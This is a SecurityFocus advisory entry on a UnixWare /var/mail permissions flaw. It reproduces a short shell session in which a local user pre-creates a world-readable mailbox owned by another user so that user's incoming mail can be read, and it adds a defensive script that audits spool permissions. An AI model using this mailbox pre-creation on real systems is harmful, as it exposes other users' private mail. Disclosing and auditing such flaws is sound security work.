SCO UnixWare '/var/mail' permissions Vulnerability

bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
/var/mail
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier

Now wait for btellier to get some mail...

[This exploit is part of the original mail on this subject posted by Brock Tellier; it is listed in its entirety in the 'Credit' section of this vulnerability entry.]
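An administrator can audit a spool for the condition shown in the session above with a check like the following. It is an added example, not part of the original advisory or mail; the function name `audit_spool` and the default path are assumptions. It reports a spool directory that is writable by all users and mailbox files whose mode grants access to other users (such as the `-rw-r--r--` file above).

```shell
#!/bin/sh
# Added example: permission audit for a mail spool directory.
# audit_spool and its output format are illustrative, not from the advisory.
# It inspects only the "other" permission bits; it does not test whether
# an unprivileged chown (as used in the session above) is permitted.

audit_spool() {
    spool=${1:-/var/mail}
    rc=0

    [ -d "$spool" ] || { echo "no such directory: $spool" >&2; return 2; }

    # Mode string of the directory, e.g. "drwxrwxrwt"; character 9 is other-write.
    dmode=$(ls -ld "$spool" | awk '{print $1}')
    if [ "$(printf '%s' "$dmode" | cut -c9)" = "w" ]; then
        echo "DIR  $dmode $spool: any local user can create mailbox files here"
        rc=1
    fi

    # Mailbox files: characters 8-9 of the mode are other-read and other-write.
    for f in "$spool"/*; do
        [ -f "$f" ] || continue
        fmode=$(ls -ld "$f" | awk '{print $1}')
        case $(printf '%s' "$fmode" | cut -c8-9) in
            --) ;;   # no read or write access for other users
            *)  echo "FILE $fmode $f: readable or writable by other users"
                rc=1 ;;
        esac
    done

    return $rc
}

# Usage: audit_spool /var/mail   (exit status 0 = clean, 1 = findings)
```

A pre-created mailbox keeps the mode it was created with when mail is later appended, so a `FILE` finding on an empty file deserves the same attention as one on a populated mailbox.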


 

Copyright 2010, SecurityFocus